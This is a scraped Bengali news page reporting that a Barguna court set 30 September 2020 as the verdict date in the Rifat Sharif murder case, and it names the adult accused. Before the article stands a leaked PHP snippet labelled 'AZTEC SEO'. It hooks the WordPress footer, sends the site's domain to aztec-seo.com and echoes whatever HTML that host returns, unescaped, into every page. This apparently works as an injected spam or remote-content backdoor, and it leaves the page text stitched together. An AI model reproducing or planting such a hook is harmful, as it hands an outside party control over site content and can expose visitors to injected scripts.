/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); বহুল আলোচিত রিফাত হত্যা মামলার রায় ৩০ সেপ্টেম্বর | Dhaka Sky News

অবরুদ্ধ গাজায় ইসরাইলের বিমান হামলা

আগের সংবাদ

বিক্ষোভে উত্তাল যুক্তরাষ্ট্রের কেন্টাকি; দুই পুলিশ গুলিবিদ্ধ

পরের সংবাদ

বহুল আলোচিত রিফাত হত্যা মামলার রায় ৩০ সেপ্টেম্বর

বরগুনা প্রতিনিধি

ঢাকা স্কাইনিউজ প্রকাশিত: September 16, 2020 , 11:38 pm

বরগুনার বহুল আলোচিত রিফাত শরীফ হত্যা মামলার রায়ের তারিখ আগামী ৩০ সেপ্টেম্বর ঘোষণা করা হয়েছে।

আজ বুধবার দুপুরে বরগুনা জেলা ও দায়রা জজ আদালতের বিচারক মো. আছাদুজ্জামান এ রায়ের তারিখ ঘোষণা করেন। নিহত রিফাতের স্ত্রী আয়েশা সিদ্দিকা মিন্নির পক্ষে যুক্তিতর্ক উপস্থাপন শেষে প্রাপ্তবয়স্ক ১০ আসামির ব্যাপারে রায় দেওয়ার এ সিদ্ধান্ত জানায় আদালত।

রাষ্ট্রপক্ষের আইনজীবী বরগুনার পাবলিক প্রসিকিউটর ভুবন চন্দ্র হালদার বলেন, পূর্ব নির্ধারিত তারিখ অনুযায়ী আজ এই মামলার যুক্তিতর্কের অবশিষ্ট অংশ আদালতে উপস্থাপন করা হয়। যুক্তিতর্ক শেষ হলে আদালত আগামী ৩০ সেপ্টেম্বর রায়ের দিন ধার্য করেন।

গত বছরের ২৬ জুন বরগুনা সরকারি কলেজের সামনে রিফাতকে কুপিয়ে হত্যা করে আসামিরা। তারপর ওই বছরের ১ সেপ্টেম্বর ২৪ জনকে অভিযুক্ত করে প্রাপ্ত ও অপ্রাপ্তবয়স্ক দু’ভাগে বিভক্ত করে আদালতে প্রতিবেদন দেয় পুলিশ।

প্রাপ্তবয়স্ক আসামিরা হলেন- নিহত রিফাতের স্ত্রী আয়েশা সিদ্দিকা মিন্নি, রাকিবুল হাসান রিফাত ফরাজি, আল কাইউম ওরফে রাব্বি আকন, মোহাইমিনুল ইসলাম সিফাত, রেজওয়ান আলী খান হৃদয় ওরফে টিকটক হৃদয়, মো. হাসান, মো. মুসা, রাফিউল ইসলাম রাব্বি, মো. সাগর ও কামরুল ইসলাম সাইমুন।

ঢাকা স্কাইনিউজ/শেখ দৌলত